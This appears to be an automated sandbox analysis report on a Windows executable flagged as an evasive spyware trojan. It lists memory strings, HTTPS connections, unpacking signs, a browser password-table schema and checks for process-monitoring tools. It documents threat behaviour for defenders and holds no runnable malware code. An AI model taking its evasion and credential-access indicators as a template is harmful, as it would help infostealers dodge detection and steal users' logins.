                Source: EI3TafelpV.exe, 00000000.00000003.1758980695.000000000113D000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: EI3TafelpV.exe, 00000000.00000003.1467791586.0000000001102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: EI3TafelpV.exe, 00000000.00000003.1467791586.0000000001102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900#
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: EI3TafelpV.exe, 00000000.00000003.1596624552.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1569669854.0000000001190000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1569789872.0000000001198000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000002.2028909755.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1613625094.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1601152613.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1593153175.000000000119F000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758765550.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampc
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: EI3TafelpV.exe, 00000000.00000003.1540566640.0000000005D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: EI3TafelpV.exe, 00000000.00000003.1540566640.0000000005D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: EI3TafelpV.exe, 00000000.00000003.1758980695.000000000113D000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: EI3TafelpV.exe, 00000000.00000003.1758980695.000000000113D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-websiteX-Frame-OptionsSAMEORIGINX-
                Source: EI3TafelpV.exe, 00000000.00000003.1540914054.0000000005AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
                Source: EI3TafelpV.exe, 00000000.00000003.1490755306.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490934152.0000000005AE3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490831175.0000000005AE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: EI3TafelpV.exe, 00000000.00000002.2031701287.0000000005B67000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000002.2031380188.0000000005AA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: EI3TafelpV.exe, 00000000.00000003.1490755306.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490934152.0000000005AE3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490831175.0000000005AE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: EI3TafelpV.exe, 00000000.00000003.1540914054.0000000005AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: EI3TafelpV.exe, 00000000.00000003.1540566640.0000000005D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                Source: EI3TafelpV.exe, 00000000.00000003.1540566640.0000000005D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                Source: EI3TafelpV.exe, 00000000.00000003.1540566640.0000000005D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: EI3TafelpV.exe, 00000000.00000003.1540566640.0000000005D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: EI3TafelpV.exe, 00000000.00000003.1540566640.0000000005D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: EI3TafelpV.exe, 00000000.00000003.1540566640.0000000005D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.9:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.9:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.216.41.233:443 -> 192.168.2.9:49719 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: EI3TafelpV.exeStatic PE information: section name:
                Source: EI3TafelpV.exeStatic PE information: section name: .rsrc
                Source: EI3TafelpV.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_011AA5C40_3_011AA5C4
                Source: C:\Users\user\Desktop\EI3TafelpV.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7524 -s 1972
                Source: EI3TafelpV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: EI3TafelpV.exeStatic PE information: Section: ZLIB complexity 0.9973980629280822
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@13/4
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7524
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\601b6186-3fec-465b-927e-a6a7b3a69e28Jump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: EI3TafelpV.exe, 00000000.00000003.1491808749.0000000005AB5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1491293577.0000000005AD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: EI3TafelpV.exeVirustotal: Detection: 56%
                Source: EI3TafelpV.exeReversingLabs: Detection: 50%
                Source: EI3TafelpV.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: EI3TafelpV.exeString found in binary or memory: G.RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeV
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile read: C:\Users\user\Desktop\EI3TafelpV.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\EI3TafelpV.exe "C:\Users\user\Desktop\EI3TafelpV.exe"
                Source: C:\Users\user\Desktop\EI3TafelpV.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7524 -s 1972
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: EI3TafelpV.exeStatic file information: File size 2959360 > 1048576
                Source: EI3TafelpV.exeStatic PE information: Raw size of wlupjtcj is bigger than: 0x100000 < 0x2aa800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\EI3TafelpV.exeUnpacked PE file: 0.2.EI3TafelpV.exe.d80000.0.unpack :EW;.rsrc :W;.idata :W;wlupjtcj:EW;xmrfofho:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wlupjtcj:EW;xmrfofho:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: EI3TafelpV.exeStatic PE information: real checksum: 0x2d342b should be: 0x2dd6ce
                Source: EI3TafelpV.exeStatic PE information: section name:
                Source: EI3TafelpV.exeStatic PE information: section name: .rsrc
                Source: EI3TafelpV.exeStatic PE information: section name: .idata
                Source: EI3TafelpV.exeStatic PE information: section name: wlupjtcj
                Source: EI3TafelpV.exeStatic PE information: section name: xmrfofho
                Source: EI3TafelpV.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01191727 push esi; retf 0_3_01191728
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01191727 push esi; retf 0_3_01191728
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01199F90 pushad ; retf 0_3_01199F91
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01199F90 pushad ; retf 0_3_01199F91
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01199F90 pushad ; retf 0_3_01199F91
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01199F90 pushad ; retf 0_3_01199F91
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01191727 push esi; retf 0_3_01191728
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01191727 push esi; retf 0_3_01191728
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01194108 push ecx; iretd 0_3_01194109
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01194108 push ecx; iretd 0_3_01194109
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_0119412B push edi; iretd 0_3_01194139
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_0119412B push edi; iretd 0_3_01194139
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_05AA90EB push esi; retf 0_3_05AA90EC
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_05AACAF3 push eax; retf 0_3_05AACB51
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_05AACAF3 push eax; retf 0_3_05AACB51
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_05AACB53 push 6805AACBh; retf 0_3_05AACB6D
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_05AACB53 push 6805AACBh; retf 0_3_05AACB6D
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01199F90 pushad ; retf 0_3_01199F91
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01199F90 pushad ; retf 0_3_01199F91
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01191727 push esi; retf 0_3_01191728
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01191727 push esi; retf 0_3_01191728
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_05AACAF3 push eax; retf 0_3_05AACB51
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_05AACAF3 push eax; retf 0_3_05AACB51
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_05AACB53 push 6805AACBh; retf 0_3_05AACB6D
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_05AACB53 push 6805AACBh; retf 0_3_05AACB6D
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01191727 push esi; retf 0_3_01191728
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01191727 push esi; retf 0_3_01191728
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01194108 push ecx; iretd 0_3_01194109
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_01194108 push ecx; iretd 0_3_01194109
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_0119412B push edi; iretd 0_3_01194139
                Source: C:\Users\user\Desktop\EI3TafelpV.exeCode function: 0_3_0119412B push edi; iretd 0_3_01194139
                Source: EI3TafelpV.exeStatic PE information: section name: entropy: 7.982543435842359

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\EI3TafelpV.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
